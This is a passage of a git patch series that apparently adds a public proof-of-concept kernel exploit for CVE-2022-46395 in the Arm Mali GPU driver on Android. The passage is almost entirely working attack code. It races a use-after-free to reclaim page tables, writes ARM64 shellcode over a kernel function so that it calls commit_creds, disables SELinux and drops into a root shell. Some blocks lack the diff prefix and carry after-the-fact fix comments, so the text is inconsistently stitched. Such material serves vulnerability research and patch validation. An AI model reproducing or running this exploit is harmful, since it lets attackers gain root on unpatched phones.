+ atom_number = write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, atom_number);
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ atom_number = write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, atom_number);
+ return atom_number;
+}
+
+int find_pgd(uint64_t* gpu_addr, int* index) {
+ int ret = -1;
+ for (int pg = 0; pg < CORRUPTED_COMMIT_SIZE; pg++) {
+ for (int i = 0; i < 0x1000/8; i++) {
+ uint64_t entry = gpu_addr[pg * 0x1000/8 + i];
+ if ((entry & 0x443) == 0x443) {
+ *index = i;
+ return pg;
+ }
+ }
+ }
+ return ret;
+}
+
+uint64_t benchmark() {
+ uint64_t time = 0;
+ int num_average = 30;
+ uint64_t arguments[2];
+ int benchmark_fd = open_dev(MALI);
+ setup_mali(benchmark_fd, 0);
+ void* tracking_page2 = setup_tracking_page(benchmark_fd);
+ arguments[0] = benchmark_fd;
+ arguments[1] = 1;
+ for (int i = 0; i < num_average; i++) {
+ softjob_reset(&(arguments[0]));
+ time += this_benchmark_time/100;
+ }
+ printf("benchmark_time %ld\n", time/num_average);
+ close(benchmark_fd);
+ return time/num_average;
+}
+
+// One attempt at the race. Sets up a fresh driver fd, creates an aio ring
+// whose backing pages become the imported user buffer, plants the sentinel
+// byte, imports/maps the buffer on the GPU, tears down the aio context, and
+// then races unmap_resources against softjob_reset on separate CPUs. On a
+// win it locates a reclaimed page table in the aliased region and pivots to
+// write_shellcode. Returns 1 on full success, 0 otherwise (setting
+// need_reset_fd when the pgd scan fails so main() reopens mali_fd2).
+int trigger(int mali_fd2) {
+
+ int mali_fd = open_dev(MALI);
+ setup_mali(mali_fd, 0);
+ void* tracking_page = setup_tracking_page(mali_fd);
+
+ // The aio ring's user mapping (returned in ctx) is the buffer we import.
+ aio_context_t ctx = 0;
+ uint32_t nr_events = 128;
+ int ret = io_setup(nr_events, &ctx);
+ if (ret < 0) err(1, "io_setup error\n");
+ char* anon_mapping = (char*)ctx;
+
+ migrate_to_cpu(WAIT_CPU);
+ // Plant the sentinel the racing thread later reads back.
+ *(volatile char *)(anon_mapping + OFF) = TEST_ENT;
+
+
+ uint64_t this_addr = (uint64_t)anon_mapping;
+ uint64_t imported_address = mem_import(mali_fd, this_addr);
+ void *gpu_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
+ MAP_SHARED, mali_fd, imported_address);
+ if (gpu_mapping == MAP_FAILED) {
+ err(1, "gpu mapping failed\n");
+ }
+ uint64_t jc = map_resource_job(mali_fd, atom_number++, (uint64_t)gpu_mapping);
+ map_external_resource(mali_fd, (uint64_t)gpu_mapping);
+ release_resource_job(mali_fd, atom_number++, jc);
+ uevent = (uint64_t)gpu_mapping;
+
+ // Destroying the aio context frees the backing pages out from under the
+ // still-imported GPU mapping — the heart of the bug being exploited.
+ if (io_destroy(ctx) < 0) err(1, "unable to destroy aio ctx\n");
+
+ pthread_t thread;
+ uint64_t args[2];
+ args[0] = mali_fd;
+ args[1] = 0;
+
+ pthread_create(&thread, NULL, &unmap_resources, (void*)&(args[0]));
+ pthread_t thread1;
+ pthread_create(&thread1, NULL, softjob_reset, (void*)&(args[0]));
+ struct sched_param sched_par = {0};
+ pthread_join(thread1, NULL);
+ pthread_join(thread, NULL);
+ check_success();
+
+ if (success) {
+ LOG("finished reset: %ld fault: %ld %ld err %d read %d\n", finished_reset_time.tv_nsec, finished_fault_time.tv_nsec, finished_fault_time.tv_sec, error_code, g_initial_read);
+
+ // Alias the freed pages from the second fd and look for a page table.
+ uint64_t alias_region = access_free_pages(mali_fd, mali_fd2, corrupted_region);
+ int index = 0;
+ int pg = find_pgd((uint64_t*)alias_region, &index);
+ if (pg != -1) {
+ LOG("found pgd at page %d\n", pg);
+ } else {
+ LOG("failed to find pgd, retry\n");
+ success = 0;
+ need_reset_fd = 1;
+ close(mali_fd);
+ return 0;
+ }
+ uint64_t pgd = alias_region + pg * 0x1000;
+ atom_number = write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd, atom_number++);
+ return 1;
+ }
+ close(mali_fd);
+ return 0;
+}
+
+int reset_mali2(int prev) {
+ if (prev != -1) close(prev);
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ void* tracking_page2 = setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ return mali_fd2;
+}
+
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+ uint64_t counter = 0;
+ select_offset();
+ int mali_fd2 = reset_mali2(-1);
+ benchmark_time = benchmark();
+ while (!success) {
+ reset();
+ int ret = trigger(mali_fd2);
+ counter++;
+ if (counter % 100 == 0) {
+ LOG("failed after %ld\n", counter);
+ }
+ if (counter % 300 == 0) {
+ benchmark_time = benchmark();
+ }
+ if (!success && need_reset_fd) {
+ mali_fd2 = reset_mali2(mali_fd2);
+ }
+ if (ret == 1) system("sh");
+ }
+ LOG("success after %ld\n", counter);
+}
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c
new file mode 100644
index 0000000..c696832
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c
@@ -0,0 +1,160 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+
+#include "mem_write.h"
+#include "mempool_utils.h"
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
/* Low 32 bits of a 64-bit value. */
static inline uint32_t lo32(uint64_t x) {
  return (uint32_t)(x & 0xffffffffULL);
}
+
/* High 32 bits of a 64-bit value. */
static inline uint32_t hi32(uint64_t x) {
  return (uint32_t)(x >> 32);
}
+
/*
 * Encode an AArch64 ADRP instruction: "adrp xRd, label" as executed at pc.
 * ADRP layout: op(1)=bit31, immlo=bits[30:29], 0b10000=bits[28:24],
 * immhi=bits[23:5], Rd=bits[4:0]; the immediate is the page delta.
 */
static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
  uint64_t pc_page = pc >> 12;
  uint64_t label_page = label >> 12;
  int64_t offset = (label_page - pc_page) << 12;
  int32_t immlo = (offset >> 12) & 0x3;
  int64_t immhi = offset >> 14;
  uint32_t insn = (uint32_t)(rd & 0x1f);
  insn |= 1u << 28;
  insn |= 1u << 31; // op
  insn |= (uint32_t)immlo << 29;
  insn |= (uint32_t)(0xffffe0 & (immhi << 5));
  return insn;
}
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+static uint64_t set_addr_lv3(uint64_t addr) {
+ uint64_t pfn = addr >> PAGE_SHIFT;
+ pfn &= ~ 0x1FFUL;
+ pfn |= 0x100UL;
+ return pfn << PAGE_SHIFT;
+}
+
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+ uint64_t vpfn = addr >> PAGE_SHIFT;
+ vpfn >>= (3 - level) * 9;
+ return vpfn & 0x1FF;
+}
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number) {
+ uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+ uint64_t curr_overwrite_addr = 0;
+ for (int i = 0; i < size; i++) {
+ uint64_t base = reserved[i];
+ uint64_t end = reserved[i] + reserved_size * 0x1000;
+ uint64_t start_idx = compute_pt_index(base, 3);
+ uint64_t end_idx = compute_pt_index(end, 3);
+ for (uint64_t addr = base; addr < end; addr += 0x1000) {
+ uint64_t overwrite_addr = set_addr_lv3(addr);
+ if (curr_overwrite_addr != overwrite_addr) {
+ LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+ curr_overwrite_addr = overwrite_addr;
+ for (int code = code_size - 1; code >= 0; code--) {
+ write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+ }
+ usleep(300000);
+ }
+ }
+ }
+ return atom_number;
+}
+
+uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+ return atom_number;
+}
+
/*
 * Probe SELinux state after the shellcode spray: read one byte from
 * /sys/fs/selinux/enforce and return it ('2' sentinel means the read did
 * not happen). The LOG prints the raw character code.
 *
 * Fix: the original passed an unchecked (possibly -1) fd to read()/close()
 * and ignored the read() result; on any failure the sentinel is now
 * preserved explicitly instead of relying on read(-1) failing benignly.
 */
int run_enforce() {
  char result = '2';
  sleep(3); // give the in-flight GPU write jobs time to land
  int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
  if (enforce_fd >= 0) {
    if (read(enforce_fd, &result, 1) != 1) {
      result = '2'; // keep sentinel on short read / error
    }
    close(enforce_fd);
  }
  LOG("result %d\n", result);
  return result;
}
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h
new file mode 100644
index 0000000..17bc0c5
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h
@@ -0,0 +1,27 @@
+#ifndef MEM_WRITE_H
+#define MEM_WRITE_H
+
+#include
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+#include "log_utils.h"
+
+#define KERNEL_BASE 0x80000000
+
+#define PAGE_SHIFT 12
+
+#define OVERWRITE_INDEX 256
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type);
+
+uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number);
+
+uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number);
+
+int run_enforce();
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c
new file mode 100644
index 0000000..9a7f134
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c
@@ -0,0 +1,61 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+
+#include "mempool_utils.h"
+
+#define POOL_SIZE 16384
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ reserved_va[i] = alloc.out.gpu_va;
+ }
+}
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed %d\n", i);
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h
new file mode 100644
index 0000000..4115669
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h
@@ -0,0 +1,19 @@
+#ifndef MEMPOOL_UTILS_H
+#define MEMPOOL_UTILS_H
+
+#include
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "log_utils.h"
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+uint64_t drain_mem_pool(int mali_fd);
+
+void release_mem_pool(int mali_fd, uint64_t drain);
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define pan_section_ptr(base, A, S) \
+ ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
+
+#define pan_section_pack(dst, A, S, name) \
+ for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
+ *_loop_terminate = (void *) (dst); \
+ __builtin_expect(_loop_terminate != NULL, 1); \
+ ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
+ _loop_terminate = NULL; }))
+
+
/*
 * Place v into bit positions [start, end] of a 64-bit word. In debug builds,
 * asserts that v fits in the field's width.
 */
static inline uint64_t
__gen_uint(uint64_t v, uint32_t start, uint32_t end)
{
#ifndef NDEBUG
   const int nbits = end - start + 1;
   if (nbits < 64)
      assert(v <= (1ull << nbits) - 1);
#endif

   return v << start;
}
+
/*
 * Extract the little-endian bit field [start, end] from the byte stream cl.
 * Gathers the covered bytes high-to-low, then shifts and masks down to the
 * field width.
 */
static inline uint64_t
__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
{
   const int width = end - start + 1;
   const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1);

   uint64_t acc = 0;
   for (int byte = end / 8; byte >= (int)(start / 8); byte--)
      acc = (acc << 8) | cl[byte];

   return (acc >> (start % 8)) & mask;
}
+
+enum mali_job_type {
+ MALI_JOB_TYPE_NOT_STARTED = 0,
+ MALI_JOB_TYPE_NULL = 1,
+ MALI_JOB_TYPE_WRITE_VALUE = 2,
+ MALI_JOB_TYPE_CACHE_FLUSH = 3,
+ MALI_JOB_TYPE_COMPUTE = 4,
+ MALI_JOB_TYPE_VERTEX = 5,
+ MALI_JOB_TYPE_GEOMETRY = 6,
+ MALI_JOB_TYPE_TILER = 7,
+ MALI_JOB_TYPE_FUSED = 8,
+ MALI_JOB_TYPE_FRAGMENT = 9,
+};
+
+enum mali_write_value_type {
+ MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
+ MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
+ MALI_WRITE_VALUE_TYPE_ZERO = 3,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
+};
+
+
+struct MALI_WRITE_VALUE_JOB_PAYLOAD {
+ uint64_t address;
+ enum mali_write_value_type type;
+ uint64_t immediate_value;
+};
+
+struct MALI_JOB_HEADER {
+ uint32_t exception_status;
+ uint32_t first_incomplete_task;
+ uint64_t fault_pointer;
+ bool is_64b;
+ enum mali_job_type type;
+ bool barrier;
+ bool invalidate_cache;
+ bool suppress_prefetch;
+ bool enable_texture_mapper;
+ bool relax_dependency_1;
+ bool relax_dependency_2;
+ uint32_t index;
+ uint32_t dependency_1;
+ uint32_t dependency_2;
+ uint64_t next;
+};
+
+
+static inline void
+MALI_JOB_HEADER_pack(uint32_t * restrict cl,
+ const struct MALI_JOB_HEADER * restrict values)
+{
+ cl[ 0] = __gen_uint(values->exception_status, 0, 31);
+ cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
+ cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
+ cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
+ cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
+ __gen_uint(values->type, 1, 7) |
+ __gen_uint(values->barrier, 8, 8) |
+ __gen_uint(values->invalidate_cache, 9, 9) |
+ __gen_uint(values->suppress_prefetch, 11, 11) |
+ __gen_uint(values->enable_texture_mapper, 12, 12) |
+ __gen_uint(values->relax_dependency_1, 14, 14) |
+ __gen_uint(values->relax_dependency_2, 15, 15) |
+ __gen_uint(values->index, 16, 31);
+ cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
+ __gen_uint(values->dependency_2, 16, 31);
+ cl[ 6] = __gen_uint(values->next, 0, 63);
+ cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
+}
+
+
+#define MALI_JOB_HEADER_LENGTH 32
+struct mali_job_header_packed { uint32_t opaque[8]; };
+static inline void
+MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
+ struct MALI_JOB_HEADER * restrict values)
+{
+ if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
+ values->exception_status = __gen_unpack_uint(cl, 0, 31);
+ values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
+ values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
+ values->is_64b = __gen_unpack_uint(cl, 128, 128);
+ values->type = __gen_unpack_uint(cl, 129, 135);
+ values->barrier = __gen_unpack_uint(cl, 136, 136);
+ values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
+ values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
+ values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
+ values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
+ values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
+ values->index = __gen_unpack_uint(cl, 144, 159);
+ values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
+ values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
+ values->next = __gen_unpack_uint(cl, 192, 255);
+}
+
+static inline const char *
+mali_job_type_as_str(enum mali_job_type imm)
+{
+ switch (imm) {
+ case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
+ case MALI_JOB_TYPE_NULL: return "Null";
+ case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
+ case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
+ case MALI_JOB_TYPE_COMPUTE: return "Compute";
+ case MALI_JOB_TYPE_VERTEX: return "Vertex";
+ case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
+ case MALI_JOB_TYPE_TILER: return "Tiler";
+ case MALI_JOB_TYPE_FUSED: return "Fused";
+ case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
+{
+ fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
+ fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
+ fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
+ fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
+ fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
+ fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
+ fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
+ fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
+ fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
+ fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
+ fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
+ fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
+ const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ cl[ 0] = __gen_uint(values->address, 0, 63);
+ cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
+ cl[ 2] = __gen_uint(values->type, 0, 31);
+ cl[ 3] = 0;
+ cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
+ cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
+}
+
+
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
+
+
+struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
+ values->address = __gen_unpack_uint(cl, 0, 63);
+ values->type = __gen_unpack_uint(cl, 64, 95);
+ values->immediate_value = __gen_unpack_uint(cl, 128, 191);
+}
+
+static inline const char *
+mali_write_value_type_as_str(enum mali_write_value_type imm)
+{
+ switch (imm) {
+ case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
+ case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
+ case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
+{
+ fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
+ fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
+}
+
+struct mali_write_value_job_packed {
+ uint32_t opaque[14];
+};
+
+#define MALI_JOB_HEADER_header \
+ .is_64b = true
+
+#define MALI_WRITE_VALUE_JOB_LENGTH 56
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
From ed8b1fd316916ded3d3643fc530584bdc43b6f07 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Mon, 3 Apr 2023 08:34:48 +0100
Subject: [PATCH 10/53] Update link
---
SecurityExploits/Android/Mali/GHSL-2023-005/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
index 76a9978..44409ad 100644
--- a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
